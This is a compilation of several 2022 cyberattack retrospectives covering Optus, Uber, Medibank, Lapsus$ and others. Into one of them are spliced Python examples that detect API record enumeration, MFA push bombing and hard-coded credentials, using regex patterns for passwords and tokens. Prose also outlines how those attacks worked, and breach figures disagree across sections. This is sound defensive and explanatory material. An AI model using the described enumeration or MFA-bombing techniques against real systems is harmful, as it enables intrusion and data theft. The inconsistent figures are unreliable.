ISACA Now Blog, 2022

Top cyberattacks of 2022: lessons learned

Raef Meeuwisse

For over a decade, I have analyzed the root causes, trends and patterns behind what post-breach management specialists like to call “unauthorized third parties” performing “really sophisticated cyberattacks”. In the past, these cyberattacks were rarely “sophisticated” – and “unauthorized third parties” almost always meant cybercriminals.

2022 was different because infamy, that quality of becoming well-known for being cosmically bad at something, or an epic clown act, is no longer a prerequisite when it comes to having your digital landscape compromised. It is no longer *always* the organizations with lousy cybersecurity that are getting their data hacked.

In 2022, when it comes to large breaches, the unauthorized third parties are not necessarily the traditional organized gangs of cybercriminals from years gone by – they might be rogue nation-states or gifted (albeit misdirected) teenagers. Many of the cyberattacks are now looking far more sophisticated than in previous years.

The past year has been so full of breaches, not even the tech journalists can agree on what measurement to use to work out which of the hacks or breaches are the worst. Should it be monetary? Number of people impacted? Amount stolen? Remediation cost?

For those reasons, I am going to take what I think are the three largest data breaches (based on number of records stolen) and identify what key lessons we can take from them.

We start with the smallest of the three data breaches:

Optus (9 million)

“Cyber Security. We won’t just do better. We’ll do best,” declares the Optus cyberattack response page. A bold statement, given that up to 9.8 million people could be impacted by the breach, which equates to approximately 40% of the entire population of Australia, the country in which it operates.

Optus has not officially divulged the root cause, but various sources report that the intrusion leveraged an application programming interface (API) that could retrieve customer details without any authentication. Why? Because it was *thought* that the API would only ever be instantiated within secure network areas.

Allegedly – due to human error – a build engineer placed an instance of this API (with access to real data) in a test environment – and that test environment was accessible over the internet. Additionally, the records inside the database had insecure serialization – meaning the intruder could use example customer record IDs to predict the reference ID of other records.
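The two gaps described above, an API that checks no caller identity and record IDs that can be guessed from one another, can each be closed on its own and can each be monitored for. The Python below is an added illustration and not Optus code or a description of its actual systems: a minimal lookup handler in the weak form beside a hardened form (a bearer token mapped to the one customer it may read, random opaque IDs instead of a counter), plus a log check that flags a client walking consecutive record numbers. Customer records, tokens, ID values and log lines are all constructed for the example.

```python
import re
import secrets
from collections import defaultdict

# Constructed sample data (not real customers): records keyed by opaque IDs.
CUSTOMERS = {
    "c_3f9a1b7e2d4c": {"name": "Alice Example", "passport": "PA0000001"},
    "c_8b2e4d6f1a9c": {"name": "Bob Example", "passport": "PA0000002"},
}

# Constructed session store: bearer token -> the one customer ID it may read.
SESSIONS = {
    "tok-alice": "c_3f9a1b7e2d4c",
    "tok-bob": "c_8b2e4d6f1a9c",
}


def new_customer_id():
    """Opaque identifier: 48 random bits, so one ID reveals nothing about its neighbours."""
    return "c_" + secrets.token_hex(6)


def lookup_customer_weak(records, customer_id):
    """The pattern the text describes: no caller identity is checked, any ID is served."""
    return records.get(customer_id)


def lookup_customer_hardened(records, sessions, bearer_token, customer_id):
    """Authenticate first (who is calling?), then authorise (may they read this record?)."""
    owner = sessions.get(bearer_token)
    if owner is None:
        return None, 401          # no valid session: unauthenticated
    if owner != customer_id:
        return None, 403          # valid session, but not this record's owner
    record = records.get(customer_id)
    return (record, 200) if record is not None else (None, 404)


# Constructed access-log lines in a simplified "client METHOD path status" form.
ACCESS_LOG = [
    "10.0.0.5 GET /api/customer/100001 200",
    "10.0.0.5 GET /api/customer/100002 200",
    "10.0.0.5 GET /api/customer/100003 200",
    "10.0.0.5 GET /api/customer/100004 200",
    "10.0.0.5 GET /api/customer/100005 200",
    "10.0.0.5 GET /api/customer/100006 200",
    "10.0.0.9 GET /api/customer/100010 200",
    "10.0.0.9 GET /api/customer/100050 200",
]
LOG_RE = re.compile(r"^(\S+) GET /api/customer/(\d+) (\d{3})$")


def detect_sequential_probing(lines, min_run=5):
    """Return {client: longest_run} for clients that fetched >= min_run consecutive record IDs.

    A legitimate user looks up their own record; a client that walks IDs in order is
    sweeping the table, which is exactly the traffic a sequential-ID API invites.
    """
    ids_by_client = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ids_by_client[m.group(1)].add(int(m.group(2)))
    flagged = {}
    for client, ids in ids_by_client.items():
        ordered = sorted(ids)
        run = best = 1
        for prev, cur in zip(ordered, ordered[1:]):
            run = run + 1 if cur == prev + 1 else 1
            best = max(best, run)
        if best >= min_run:
            flagged[client] = best
    return flagged


if __name__ == "__main__":
    print(lookup_customer_hardened(CUSTOMERS, SESSIONS, "tok-alice", "c_8b2e4d6f1a9c"))  # (None, 403)
    print(detect_sequential_probing(ACCESS_LOG))  # {'10.0.0.5': 6}
```

The two controls are independent on purpose: the ownership check stops a valid user reading someone else's record even if IDs leak, and the opaque IDs make a sweep infeasible even if an unauthenticated copy of the API is ever exposed again. The log check is the detection layer for the case where both of the first two fail.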

If the information above proves to be correct, there were multiple significant, major and critical security control gaps at Optus (what I have always referred to as stacked risks). As I have stated in the past, any enterprise taking a siloed approach and looking at individual risks can easily miss the potential magnitude of their overall exposure.

Optus has set aside ~$95m (A$140m) to cover the fallout from this data breach.

Lesson Learned from Optus Breach: Do not be tempted to let multiple known security risks sit unresolved because your organization *thinks* there is another layer of security in place. Why? *Because* that other layer of security will be taking the same approach.

As with every megabreach, intruders need to find multiple holes in the security of a digital landscape to do real damage and take substantial amounts of data.

Uber (57 million)

This next example begins with an attack vector that is part of an intrusion trend. The hacker, in this case understood to be a teenager affiliated with Lapsus$, compromised the multi-factor authentication (MFA) by bombarding one person with authentication requests. Eventually, the authorized user accepted one of the bogus authentication requests, enabling the intruder to gain access to the company VPN (virtual private network).

(Side note: In a prior cyberattack earlier in the year, Lapsus$ had a 5% success rate in this type of MFA request-bombing attack vector, which was much higher than the 0.1% predicted by some marketing materials.)
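A detection for the prompt-bombing pattern just described. This is an added example, not something from the post or from the Uber or Lapsus$ incident reporting, and it assumes a simplified MFA event feed of (timestamp, user, result) tuples constructed inline; real vendor logs use different field names but carry the same three facts. The check counts denied or unanswered prompts per user inside a sliding window and escalates when an approval lands after the flood, which is the outcome the text describes.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed MFA push events (not real vendor output): (UTC timestamp, user, result).
# A result of "denied" or "timeout" is a prompt the user did not approve.
MFA_EVENTS = [
    ("2022-09-15T02:10:05Z", "jdoe", "denied"),
    ("2022-09-15T02:10:41Z", "jdoe", "timeout"),
    ("2022-09-15T02:11:20Z", "jdoe", "denied"),
    ("2022-09-15T02:12:02Z", "jdoe", "timeout"),
    ("2022-09-15T02:13:15Z", "jdoe", "denied"),
    ("2022-09-15T02:14:50Z", "jdoe", "approved"),   # approval after five rejections
    ("2022-09-15T09:00:00Z", "asmith", "approved"),
    ("2022-09-15T09:05:00Z", "asmith", "denied"),    # a single mis-tap: normal noise
]

UNAPPROVED = {"denied", "timeout"}


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def detect_push_fatigue(events, window=timedelta(minutes=10), threshold=3):
    """Return {user: status} for users who hit `threshold` unapproved prompts inside `window`.

    status is "flood" while the prompts are still being rejected, and
    "approved_after_flood" if an approval lands inside the same window, which
    is the case worth paging on: the user has very likely accepted a prompt
    they did not initiate.
    """
    by_user = defaultdict(list)
    for ts, user, result in events:
        by_user[user].append((parse_ts(ts), result))

    alerts = {}
    for user, evs in by_user.items():
        evs.sort()
        start = 0
        for i, (t, result) in enumerate(evs):
            # slide the window's left edge forward so it covers (t - window, t]
            while evs[start][0] < t - window:
                start += 1
            unapproved = sum(1 for _, r in evs[start:i + 1] if r in UNAPPROVED)
            if unapproved >= threshold:
                status = "approved_after_flood" if result == "approved" else "flood"
                if alerts.get(user) != "approved_after_flood":
                    alerts[user] = status   # escalate, never downgrade
    return alerts


if __name__ == "__main__":
    print(detect_push_fatigue(MFA_EVENTS))  # {'jdoe': 'approved_after_flood'}
```

The threshold is deliberately low: a real user rarely rejects three prompts in ten minutes, and a "flood" alert fired while the prompts are still being rejected gives the help desk a chance to reach the user before the attacker gets the approval.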

Once inside the Uber VPN, the attacker was able to leverage several sub-optimal security configuration settings within the network and locate a PowerShell script that contained hard-coded privileged account management system (PAMS) credentials.

Once inside the PAMS, the intruder was able to access multiple tools and storage areas containing millions of Uber drivers and user records.

Lesson Learned from Uber Breach: Never rely on MFA alone to protect critical assets. Expect that hackers will compromise MFA on occasion and will target your highest value security assets (such as PAMS).

Take steps to mitigate the potential for compromise of these systems by, for example, minimizing any system accounts to the very least privilege they require, having automated monitoring alerts for any unusual behaviors and enforcing the highest standards of security best practice.

If you *must* place privileged access credentials in any system scripts, then compensating controls, such as surgically limiting permissions and automated monitoring, will be required.
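One compensating control implied by the two paragraphs above is to find embedded credentials in scripts before an intruder does. The scanner below is an added example, not code from the post, from Uber or from any named product. It runs three regular-expression rules over a constructed PowerShell snippet whose variable names and placeholder values are invented for the illustration, and reports each hit with the value redacted so that the report itself does not become a second copy of the credential.

```python
import re

# Constructed PowerShell snippet standing in for the kind of script the text describes.
# Variable names and values are invented placeholders, not real credentials.
SAMPLE_SCRIPT = r'''
# Deployment helper (constructed example)
$PamUser = "svc_pam_admin"
$PamPassword = "P@ssw0rd-PLACEHOLDER"
$Cred = New-Object System.Management.Automation.PSCredential($PamUser, (ConvertTo-SecureString $PamPassword -AsPlainText -Force))
Invoke-RestMethod -Uri "https://pam.example.internal/api" -Headers @{ Authorization = "Bearer eyJPLACEHOLDER.TOKEN.VALUE" }
$Safe = Get-Secret -Name "pam-admin"   # fetched from a vault at run time: not a finding
'''

# Each rule captures the literal value in group 1 so it can be redacted in the report.
PATTERNS = [
    ("assigned_password",
     re.compile(r'\$\w*(?:pass(?:word)?|pwd|secret)\w*\s*=\s*"([^"]+)"', re.I)),
    ("plaintext_securestring",
     re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)),
    ("bearer_token",
     re.compile(r'Bearer\s+([A-Za-z0-9._\-]{16,})')),
]


def redact(value):
    """Keep just enough of the literal to locate it in the file, never the whole secret."""
    if len(value) <= 6:
        return "***"
    return value[:3] + "***" + value[-2:]


def scan_script(text):
    """Return [(line_no, rule_name, redacted_value)] for every literal that looks like a credential."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in PATTERNS:
            for m in pattern.finditer(line):
                findings.append((line_no, rule, redact(m.group(1))))
    return findings


if __name__ == "__main__":
    for hit in scan_script(SAMPLE_SCRIPT):
        print("line %d: %s (%s)" % hit)
```

The last line of the sample, a secret pulled from a vault at run time, is what the hard-coded lines should be replaced with; it produces no finding because nothing sensitive is written into the file. Run the scan as a pre-commit or pipeline step so a script like this never reaches a share where an intruder on the VPN could read it.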

Neopets (69 million)

Although I did state that an enterprise no longer needs to fail badly at cybersecurity, in my view, this breach seems to flatly fall into that category. Neopets managed to get its source code and 69 million user details stolen … without noticing until the cybercriminal offered to sell their database.

As Neopets put it in their statement:

[Figure 1: image of the Neopets statement, not reproduced here]

As part of that same statement, Neopets stated that it “… is committed to safeguarding our players' personal information.” – which felt a little hollow – but at least the company committed to more extensively implementing MFA and strengthening security.

With the dwell-time (time from intrusion to discovery) of around 16 months, the intruders were able to take a leisurely stroll around the internal digital landscape for a long time without any fear of detection.

Lesson Learned from Neopets Breach: Underinvestment in cybersecurity continues to be a false economy. Breaches create brand damage, remediation work and potential regulatory fines that massively outweigh any initial cost-savings from underspending on security operations. When regulators look at organizations after a breach, the main question is: Can this enterprise demonstrate due diligence in how it invested in and operated its cybersecurity BEFORE the breach took place?

Average Isn’t Good Enough

2022 saw most organizations continuing to scale up their investments in cybersecurity as awareness grew that skimping on infosec was not a wise or viable way forward. Nonetheless, 2022 was still a cyberattack wasteland because the threats are still moving faster than the *average* enterprise.

Hackers (ethical or otherwise) can get in through the tiniest of gaps. If there are layers of security gaps, then intruders can also get back out with a lot of data.

Expect that it is the multiple unresolved gaps that can seem small on their own that hackers can stack together to form a bridge into and back out of your critical systems.

Expect intruders to try to target and re-purpose the tools and processes your enterprise uses to keep itself secure (such as multi-factor authentication and PAMS).

For me, the primary breach lesson from 2022 is this:

If your enterprise security wants to stay ahead – do not aim to be average – aim to be exceptional.


The biggest data breaches and leaks of 2022

The data breaches that had the biggest impact in the cyber security world over the past 12 months.

Olivia Powell

More than 4,100 publicly disclosed data breaches occurred in 2022, equating to approximately 22 billion records being exposed. Cyber security publication Security Magazine reported that the final figures for 2022 are expected to exceed this by as much as five percent.

In this article, we reveal which data breaches, leaks, phishing campaigns, malware and cyber attacks ranked among our ten most-read cyber security news stories of 2022.

Read on to hear about data breaches at Revolut, Twitter, Uber and Rockstar, and let us know if you were impacted by any of the incidents covered in the comment section below. 

10. Revolut data breach exposes information for more than 50,000 customers

The personal information of more than 50,000 users of fintech start-up Revolut was accessed during a data breach that took place on September 11, 2022. The breach involved a third party gaining access to Revolut’s database and the personal information of 50,150 users.

The data accessed included names, home and email addresses, and partial payment card information, although Revolut has stated that card details were masked. The Lithuanian government said that Revolut had taken “prompt action to eliminate the attacker's access to the company's customer data and stop the incident” once it was discovered.

Learn more about public response to the breach in this September post.

9. SHEIN fined US$1.9mn over data breach affecting 39 million customers

In October, Zoetop Business Company, the firm that owns fast fashion brands SHEIN and ROMWE, was fined US$1.9mn by the state of New York after failing to disclose a data breach which affected 39 million customers. 

The cyber security incident which took place in July 2018 saw a malicious third party gain unauthorized access to SHEIN’s payment systems. According to a statement issued by the state of New York’s Attorney General’s office, SHEIN’s payment processor contacted the brand and disclosed that it had been “contacted by a large credit card network and a credit card issuing bank, each of which had information indicating that [Zoetop’s] system[s] have been infiltrated and card data stolen”. 

The discovery was made after the credit card network found SHEIN customers’ payment details for sale on a hacking forum.

Read more about SHEIN’s mishandling of the breach in this October post.

8. Student loan data breach leaks 2.5 million social security numbers

A data breach on student loan servicer Nelnet Servicing caused the confidential information of more than 2.5 million users to be leaked in June 2022.  

The investigation concluded on August 17, 2022, that due to a vulnerability in its system, student loan account registration information, including names, home and email addresses, phone numbers and social security numbers, was accessible to an unknown third party from June until July 22, 2022.

Following this discovery, Nelnet Servicing notified the US Department of Education and law enforcement.

Learn more about the response to the data breach in this August post.

7. Twitter confirms data from 5.4 million accounts was stolen

In July 2022, a hacker that went by the alias ‘devil’ posted on hacking forum BreachForums that they had the data of 5.4 million Twitter accounts for sale.

The stolen data included email addresses and phone numbers from “celebrities, companies, randoms, OGs”. ‘OGs’ refers to Twitter handles that are either short, comprising one or two letters, or a word that is desirable as a screen name, for example, a first name with no misspelling, numbers or punctuation. The hacker ‘devil’ said they would not be accepting offers “lower than [$30,000]” for the database.

The data breach was the result of a vulnerability on Twitter that was discovered in January 2022.

Learn more about the vulnerability that led to the data breach here.

6. Hacker allegedly hits both Uber and Rockstar

Between September 15–19, 2022, a hacker allegedly hit both rideshare company Uber and video game company Rockstar.

On September 15, Uber’s internal servers were accessed after a contractor’s device was infected with malware and their login details were sold on the dark web. The hacker accessed several other employee accounts, which then gave them access to a number of internal tools. The hacker then posted a message to a company-wide Slack channel and reconfigured Uber’s OpenDNS to display a graphic image to employees on some internal sites.

The hack into Rockstar Games, developer of the Grand Theft Auto (GTA) game series, was discovered on September 19, 2022. A user called teapotuberhacker posted on Grand Theft Auto game series fan site GTAForums: “Here are 90 footage/clips from GTA 6. It’s possible I could leak more data soon, GTA 5 and 6 source code and assets, GTA 6 testing build.” 

In the post’s comments, the hacker claimed they had “downloaded [the gameplay videos] from Slack” by hacking into a channel used for communicating about the game.

Rockstar Games made a statement via Twitter that said the company had suffered a “network intrusion” which had allowed an unauthorized third party to “illegally access and download confidential information from [its] systems”, including the leaked GTA 6 footage.

Discover who orchestrated the hack and what happened to them in this September post.

5. 9.7 million peoples’ information stolen in Medibank data leak

On October 13, 2022, Australian healthcare and insurance provider Medibank detected some “unusual activity” on its internal systems. The company was then contacted on October 17 by the malicious party, who aimed to “negotiate with the [healthcare] company regarding their alleged removal of customer data”. However, Medibank publicly refused to bend to the hacker’s demands.

Medibank revealed the true extent of the hack on November 7, announcing that the malicious actor had gained unauthorized access to and stole the data for 9.7 million past and present customers. The information included confidential and personally identifying information on medical procedures including codes associated with diagnosis and procedures given.

Following Medibank’s continued refusal to pay a ransom, the hacker released files containing customer data called "good-list" and "naughty-list" on November 9, 2022.

The so-called “naughty-list” reportedly included details on those who had sought medical treatment for HIV, drug addiction or alcohol abuse or for mental health issues like eating disorders. 

On November 10, they posted a file labelled “abortions” to a site backed by Russian ransomware group REvil, which apparently contained information on procedures that policyholders have claimed on, including miscarriages, terminations and ectopic pregnancies.

Find a full timeline of the Medibank data leak in this November post.

4. Hacker attempts to sell data of 500 million WhatsApp users on dark web

On November 16, 2022, a hacker posted a dataset to BreachForums containing what they claimed to be up-to-date personal information of 487 million WhatsApp users from 84 countries.  

In the post, the alleged hacker said those who bought the datasets would receive “very recent mobile numbers” of WhatsApp users. According to the bad actor, among the 487 million records are the details for 32 million US users, 11 million UK users and six million German users. 

The hacker did not explain how such a large amount of user data had been collected, saying only that they had “used their strategy” to obtain it.

Learn more about the data breach in this November post.

3. Personal and medical data for 11 million people accessed in Optus data breach  

Australian telecommunication company Optus suffered a devastating data breach on September 22, 2022 that has led to the details of 11 million customers being accessed. 

The information accessed included customers’ names, dates of birth, phone numbers, email and home addresses, driver’s license and/or passport numbers and Medicare ID numbers. 

Files containing this confidential information were posted on a hacking forum after Optus refused to pay a ransom demanded by the hacker. Victims of the breach also said that they were contacted by the supposed hacker demanding they pay AU$2,000 (US$1,300) or their data would be sold to other malicious parties.

Find out more about how the Optus data breach occurred in this September post.

2. More than 1.2 million credit card numbers leaked on hacking forum

Carding marketplaces are dark web sites where users trade stolen credit card details for financial fraud, usually involving large sums of money. On October 12, 2022, carding marketplace BidenCash released the details of 1.2 million credit cards for free. 

A file posted on the site contained the information on credit cards expiring between 2023 and 2026, in addition to other details needed to make online transactions.

BidenCash had previously leaked the details of thousands of credit cards in June 2022 as a way to promote the site. As the carding marketplace had been forced to launch new URLs three months later in September after suffering a series of DDoS attacks, some cyber security experts suggested this new release of details could be another attempt at advertising.

Discover how BidenCash gained access to 1.2 million credit card details in our October coverage.

1. Twitter accused of covering up data breach that affects millions

On November 23, 2022, Los Angeles-based cyber security expert Chad Loder tweeted a warning about a data breach at social media site Twitter that had allegedly affected “millions” across the US and EU. Loder claimed the data breach occurred “no earlier than 2021” and “has not been reported before”. Twitter had previously confirmed a data breach that affected millions of user accounts in July 2022, as seen in point seven of this article.

Loder stated, however, that this “cannot” be the same breach as the one they reported on unless the company “lied” about the July breach. According to Loder, the data from the November breach is “not the same data” as that seen in the July breach, as it is in a “completely different format” and has “different affected accounts”. Loder said they believed that the breach occurred due to malicious actors exploiting the same vulnerability as the hack reported in July.

Learn more about the data breach and those impacted in this November post.

To explore more of the most-read cyber security news articles from Cyber Security Hub, click here to discover the top 10 cyber security threats and attacks of 2022.

Which data breach had the biggest impact on you? Let us know in the comments.


Uber Investigating Breach of Its Computer Systems

The company said on Thursday that it was looking into the scope of the apparent hack.


By Kate Conger and Kevin Roose

Uber discovered its computer network had been breached on Thursday, leading the company to take several of its internal communications and engineering systems offline as it investigated the extent of the hack.

The breach appeared to have compromised many of Uber’s internal systems, and a person claiming responsibility for the hack sent images of email, cloud storage and code repositories to cybersecurity researchers and The New York Times.

“They pretty much have full access to Uber,” said Sam Curry, a security engineer at Yuga Labs who corresponded with the person who claimed to be responsible for the breach. “This is a total compromise, from what it looks like.”

An Uber spokesman said the company was investigating the breach and contacting law enforcement officials.

Uber employees were instructed not to use the company’s internal messaging service, Slack, and found that other internal systems were inaccessible, said two employees, who were not authorized to speak publicly.

Shortly before the Slack system was taken offline on Thursday afternoon, Uber employees received a message that read, “I announce I am a hacker and Uber has suffered a data breach.” The message went on to list several internal databases that the hacker claimed had been compromised.


Top 10 cyber crime stories of 2022

Cyber crime continued to hit the headlines in 2022, with impactful cyber attacks abounding, digitally enabled fraud ever more widespread and plenty of ransomware incidents.

Alex Scroxton, Security Editor

High-profile cyber attacks elevated cyber security and cyber crime to dinner table conversation in 2021, and although there was no repeat of the Colonial Pipeline incident in 2022, awareness of cyber issues among the general public has never been higher.

And cyber criminals showed no sign of slowing down in 2022, even though ransomware attack volumes appeared to drop off for a time, in a trend likely linked to the war in Ukraine.

This year saw high-profile attacks on well-known organisations, disruption to the UK’s supply of crisps and new battles in the fight against digitally enabled fraud, while a cyber crime spree by a gang of troublesome kids caused consternation.

Here are Computer Weekly’s top 10 cyber crime stories of 2022.

1. Umbrella company Brookson self-refers to NCSC following cyber attack on its network

In January, contractor payroll service provider Brookson Group referred itself to the National Cyber Security Centre (NCSC) after an “extremely aggressive” cyber attack that forced it to take systems offline. Coming amid the ongoing IR35 controversy, this incident, and a separate attack on a different umbrella firm, disrupted salary payments for thousands.

2. Cyber attacks on European oil facilities spreading

In February, a series of cyber attacks targeting oil distribution terminals and other facilities in Europe had authorities on high alert, given rising fuel prices and the threat of supply disruption as the political crisis in Ukraine escalated into conflict.

3. How Lapsus$ exploited the failings of multifactor authentication

A series of attacks on technology suppliers by a group known as Lapsus$ grabbed the headlines early in 2022, and although some gang members were arrested, these attacks have continued later into the year. In March, we explored how Lapsus$ attacks on Nvidia and Okta highlighted weak multifactor authentication and the risks of employees being bribed or falling victim to social engineering.

4. Crisp supply shortage looms after KP Snacks hit by ransomware

Every so often, a cyber attack hits the front pages of the UK’s tabloid newspapers, and February’s Conti ransomware attack on the systems of KP Snacks, the company behind iconic brands such as Hula Hoops, Space Raiders and the eponymous peanuts, made the cut. Computer Weekly heard from security experts about the incident, one of whom spoke of a “dark day for crisp aficionados”.

5. Did the Conti ransomware crew orchestrate its own demise?

Conti hit the headlines again in May, when it shut down amid suggestions it had orchestrated its own downfall for its members to split off into new operations. Ransomware cartels come and go, but Conti was a particularly dangerous group, and its loss was not mourned.

6. Uber suffers major cyber attack

Ride-sharing service Uber was one of 2022’s high-profile cyber attack victims in September, when it suffered a supposed social engineering attack on an employee by an apparent teenage hacktivist who wanted the company to pay its drivers more money. The incident saw multiple systems at Uber disrupted; the company later blamed the Lapsus$ collective.

7. South Staffs Water customer data leaked after ransomware attack

A somewhat botched Clop/Cl0p ransomware attack on South Staffordshire Water in August seemed to have been largely forgotten, until it emerged at the end of November that the gang had stolen customer data and leaked it on the dark web. The data included names and addresses, bank details including sort codes and account numbers, and possibly other personal data. Customers of sister company Cambridge Water also seem to have been hit.

8. TalkTalk hacker Daniel Kelley gives up his black hat for good

The Lapsus$ cyber crime spree put teenage hackers and so-called script kiddies, rather than advanced ransomware gangs, in the spotlight this year, and in June, Computer Weekly spoke to one of the UK’s most famous teenage hackers, Daniel Kelley, who was just 17 when he played a key role in the infamous TalkTalk cyber attack. Kelley is still laser-focused on cyber security, but is planning to pursue a legitimate career.

9. UK police arrest 120 in largest-ever cyber fraud crackdown

Ransomware gangs rarely directly target consumers, making digitally enabled fraud arguably the most likely way the average person is going to fall victim to cyber crime. The fight against fraud continued in 2022, and in November, the Metropolitan Police revealed details of its role in a major operation that took down a cyber criminal website and saw more than 100 arrests.

10. Rackspace email outage confirmed as ransomware attack

At the beginning of December, a sudden drop in service for users of Rackspace’s Hosted Exchange business caused widespread chaos before being confirmed as a ransomware attack by an unspecified group. Full details of the incident are not yet known, but given how many Computer Weekly readers tuned in, it will likely prove one of the more disruptive cyber crime incidents of the year.


2022 has shaped up to be a pricey year for victims of cyberattacks.

Cyberattacks continue to target critical infrastructures such as health systems, small government agencies and educational institutions. Ransomware remains a popular attack method for large and small targets alike. While organizations may choose not to disclose the costs associated with a cyberattack, the loss of consumer trust will always be a risk after any significant attack.

Let’s look at the 13 costliest cyberattacks of the past year and the trends that defined major threats from the beginning of 2022 to now.

1. November 2022: Government of Costa Rica

The government of Costa Rica recently declared a state of emergency after enduring weeks of ransomware attacks on its critical systems. As a result, the government could not pay its workers on time and asked them to apply for payment through email or paper-based methods. The attack also disrupted tax and customs systems, causing the country’s import/export logistics to collapse. The Conti ransomware gang demanded a $20 million ransom payment, claiming the attacks were done to overthrow the government. The criminal gang published an estimated 50% of the data stolen during the weeks-long attack. The Costa Rican government has not paid the ransom.

2. October 2022: Medibank

A costly attack on health insurer Medibank affected all of its 3.9 million current and former customers. Attackers demanded a ransom payment of $9.7 million not to publish the stolen data, which Medibank refused to pay. The criminal gang then threatened to release data each day the ransom remained unpaid. Even before customer compensation and regulatory and legal costs were paid, the attack was estimated to cost Medibank $25 to $35 million. In addition, Medibank delayed insurance premium increases until January 2023, which will cost the company another $62 million.

3. October 2022: CommonSpirit Health System

A ransomware attack on CommonSpirit Health System affected patients across the country. As one of the largest U.S. hospital operators, the system operates 140 hospitals and 2,000 patient care sites. Electronic health records were unavailable while the hospital’s system was offline. The attack directly affected patient care when some patients received the wrong dosages and others had to delay important surgeries, including at least one cancer surgery. An estimated 20 million patients were affected by this attack.

4. September 2022: Uber

The attack on Uber this year showcased the dangers presented by social engineering. Threat actors broke through the company’s defense by sending a fake two-factor authentication notification urging the victim to click a link to verify a request. After compromising the employee account, the attackers used the company’s virtual private network to access internal network resources. They gained access to the company’s privileged access management (PAM) service, used it to escalate account privileges and claimed to have access to several Uber systems, including AWS, Duo, GSuite, OneLogin, Slack, VMware and Windows.

5. September 2022: Rockstar Games

After gaining access to the company’s internal systems, an attacker downloaded the complete source code for Grand Theft Auto 5 and 6 and other confidential information in an attack on Rockstar Games. This breach occurred by targeting collaboration tools used by developers, such as Slack and Confluence Wiki. The attackers appeared to be more interested in extortion than publishing the stolen data.

6. May 2022: AcidRain Wiper Malware

Widespread wiper malware attacks have wracked Ukraine since its war with Russia began. The AcidRain malware uses brute-force attacks to find device file names and then wipes every file it can find. The attacks have knocked tens of thousands of modems offline since they began in early 2022.

7. April 2022: U.K. National Health Service (NHS)

The NHS provides infrastructure for tens of thousands of health organizations. Over a period of six months, an attack compromised over 100 NHS employee accounts and used them to send phishing emails. Some phishing campaigns attempted to steal Microsoft credentials. These phishing emails were primarily fake document download alerts, complete with an NHS disclaimer at the end of each message. Though the NHS migrated to Office 365, that didn’t entirely end the fraudulent messages, which continued in much smaller numbers.

8. April 2022: Austin Peay State University

A ransomware attack on Austin Peay State University brought the university to a halt just before final exams began. The university urged faculty, staff and students to disconnect university computers from the network and avoid using any university devices on campus or at home. Only personal devices such as laptops and cell phones could continue to access email and other university resources. The university canceled final exams and closed all computer labs.

9. April 2022: Florida International University

A ransomware gang attacked Florida International University just weeks after the attack on North Carolina Agricultural and Technical State University (A&T). The same group, ALPHV/BlackCat, claimed responsibility for both. Attackers exfiltrated 1.2 terabytes of sensitive data, including social security numbers, accounting documents and email databases. At the time of the incident, the university announced there was no evidence that the attack had compromised information. However, security researchers examined stolen data and verified it was real.

10. March 2022: North Carolina A&T

North Carolina Agricultural and Technical State University became a ransomware victim during spring break. The attack targeted multiple systems, including Blackboard, Banner ERP, Qualtrics, VPN, Jabber and Chrome River. Extended outages meant students could not submit assignments, and classes were canceled. The ransomware gang responsible for the attack claimed it stole the personal data of faculty, staff and students, as well as contracts, financial data and multiple databases.

11. February 2022: Nvidia

Earlier this year, microchip maker Nvidia suffered an attack during which one terabyte of data was stolen, including usernames and cryptographic hashes for more than 70,000 Nvidia employees. The Lapsus$ ransomware gang claimed responsibility for the hack. The criminal gang first demanded the removal of a feature that makes Nvidia graphic cards less desirable for crypto mining, then later modified the demand for open-source graphics drivers for all future cards. The gang threatened to release the stolen data if Nvidia did not meet their demands.

12. January 2022: Red Cross

Attackers targeted a Red Cross family reunification program through an unpatched vulnerability in the organization’s enterprise password management platform. The targeted reunification program reconnects families separated by migration, war and disaster. State-sponsored threat actors were likely responsible since the attack was tailored specifically for Red Cross systems. Attackers remained in the system for more than 70 days with access to personally identifiable information, including location, of more than 515,000 people in the program.

13. January 2022: Twitter

At the beginning of 2022, an attacker used a zero-day vulnerability to gain access and siphon the usernames, phone numbers and email addresses of nearly 6 million Twitter users. Stolen user data was likely combined with other information scraped from the web to build a database later offered for sale on a hacker forum.

Above all, these attacks illustrate the importance of continuous vigilance against cyberattacks. Clearly, ransomware and high-profile attacks have proved especially insidious. Whatever 2023 brings, we must be ready to face it with the right strategies and resources. IBM’s Security Framing and Discovery Workshop is a great no-cost option to improve your organization’s cybersecurity posture in time to meet the next threat.

If you are experiencing cybersecurity issues or an incident, contact X-Force to help: U.S. hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034.

Cyber Threats 2022: A Year in Retrospect

“Blindsided” is cybersecurity’s worst-case scenario. The threat you don’t know about; the attack you don’t see coming; the hacker hiding undetected in your networks: unknowns are what can take a company down. Exposing them is what threat intelligence lives to do.

Companies in 2022 faced an array of threat actors: sophisticated advanced persistent threats, or APTs; ruthless cyber criminals; disgruntled insiders; a resurgence in hacktivism and distributed denial of service (DDoS) attacks, and more. Geopolitics dominated the headlines and the cybersphere, even as threat actors continually shifted tactics and techniques and shared their tools, motivated by sabotage, espionage and money.

And in 2022, public and private sectors joining forces and sharing their intelligence bolstered organisations’ defences. 

Our report “Cyber Threats 2022: A Year in Retrospect” examines the threat actors, trends, tools and motivations that captured the cyber threat landscape last year. It includes incident response case studies with direct and detailed insight into tools, techniques and procedures (TTPs) used in intrusions. We also provide detection logic throughout the report to assist your defenders when scanning your own systems and networks, to help you find malicious threat actors.

With context for what to expect in 2023 from the report, we strive, as always, to not only keep pace with hostile cyber activity, but to get ahead of it, and stay ahead. 

Vulnerability and threat actor agility


  • The Log4Shell vulnerability in Apache’s Log4j Java logging framework is thought to have affected 93% of business cloud environments and hundreds of millions of machines. A range of cyber threats jumped on the opportunity to exploit this vulnerability as organisations worked to identify impacted instances in their environments.
  • Threat actors ranging in motivation and sophistication made use of commoditised and shared tooling and frameworks to accelerate and optimise their operations. Attackers also engaged in fast-moving, brute force attempts to fatigue users and security measures through social engineering or multifactor authentication (MFA) bypassing.
